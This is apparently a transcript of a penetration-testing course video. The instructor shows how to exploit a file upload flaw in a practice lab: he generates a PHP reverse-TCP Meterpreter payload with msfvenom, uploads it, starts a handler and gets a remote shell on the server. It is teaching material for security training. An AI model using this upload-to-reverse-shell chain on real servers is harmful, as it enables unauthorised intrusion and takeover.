Hello all, welcome to the Web Application Pen Testing course at Pentester Academy. Now in this video, we will look at how exploiting file uploads we can actually get a Meterpreter on the box. So the process is actually quite straightforward. The first is to create a PHP Meterpreter and then to upload it on the remote server using the file upload vulnerability. After that, we set up an exploit handler locally on the attacker machine and execute the PHP Meterpreter to get access to the box. So let's jump right in. Now I'm going to be using the very first example, which is the basic example on file uploads for this demo, and I would recommend that you try out for all the other variations in file upload vulnerabilities which we have discussed in the last couple of videos. So let's jump right in. Now the first task is to create a PHP Meterpreter. So this can be done using MSF Venom -p PHP Meterpreter reverse TCP. The output format would be raw, and then we would go ahead and redirect this into, let's say, meterpreter.php. Now as it's a reverse TCP, the lhost parameter needs to be given as well, which would be our local IP address. Let's verify what that is. On the attacker machine, my IP is 192.168.2.21. So 192.168.2.21. So we have our PHP Meterpreter. Let's open it up. Now if you notice, there is a guard bit, the hash in there. Let's remove that. Let's save the PHP file. And now let's go ahead and upload this on the remote server using the file upload vulnerability. So let me go in there. Let's click on uploads. And there is our meterpreter.php. Fantastic. Now before we execute it, let's go ahead and set up an appropriate handler on the attacker machine. Reverse TCP. Let me now set lhost to 192.168.2.21 and let's hit exploit, and now our reverse TCP handler is waiting for a connection. So let's go ahead now, execute meterpreter.php remotely, and there we go, we have our Meterpreter session on the box. Right? Fantastic, right? So this is how we can go from a file upload vulnerability to Meterpreter on the box, right? Now at this point, one could figure out how privilege escalation can be done by learning more about the version of Linux, the kernel, and a bunch of other possibilities. Fantastic. So please try this out with other vulnerable scripts I have given out in the file upload series in the last couple of videos, and hopefully this will be a fun experience. And if you're enjoying your time at Pentester Academy, then we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you.